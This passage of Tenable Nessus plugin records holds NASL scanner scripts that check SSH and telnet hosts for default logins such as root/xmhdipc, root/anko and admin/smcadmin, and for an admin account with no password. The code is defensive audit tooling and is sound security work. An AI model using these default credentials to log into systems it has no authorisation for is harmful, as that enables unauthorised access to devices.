get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:06", "description": "The account 'admin' on the remote host has the default password 'smcadmin'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'smcadmin' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_SMCADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/94371", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"smcadmin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94371);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'smcadmin' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'smcadmin'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:06", "description": "The account '888888' on the remote host has the default password '888888'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '888888' for '888888' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_888888_888888.NASL", "href": "https://www.tenable.com/plugins/nessus/94357", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"888888\";\npassword = \"888888\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94357);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '888888' for '888888' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account '888888' on the remote host has the default password\n'888888'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:07", "description": "The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'anko' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ANKO.NASL", "href": "https://www.tenable.com/plugins/nessus/94387", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"anko\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94387);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'anko' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:07", "description": "The account 'admin' has no password set. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Unprotected 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/94358", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94358);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unprotected 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' has no password set. A remote attacker can exploit\nthis issue to gain administrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here :\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:25", "description": "The account 'root' on the remote host has the default password 'xmhdipc'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'xmhdipc' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_XMHDIPC.NASL", "href": "https://www.tenable.com/plugins/nessus/94401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"xmhdipc\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94401);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'xmhdipc' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'xmhdipc'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:26", "description": "The account 'root' on the remote host has the default password '666666'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '666666' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_666666.NASL", "href": "https://www.tenable.com/plugins/nessus/94382", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"666666\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94382);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '666666' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'666666'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:27", "description": "The account 'root' on the remote host has the default password 'user'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'user' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_USER.NASL", "href": "https://www.tenable.com/plugins/nessus/94398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"user\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94398);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'user' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'user'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:27", "description": "The account 'tech' on the remote host has the default password 'tech'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'tech' for 'tech' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_TECH_TECH.NASL", "href": "https://www.tenable.com/plugins/nessus/94406", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"tech\";\npassword = \"tech\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94406);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'tech' for 'tech' Account\");\n\n 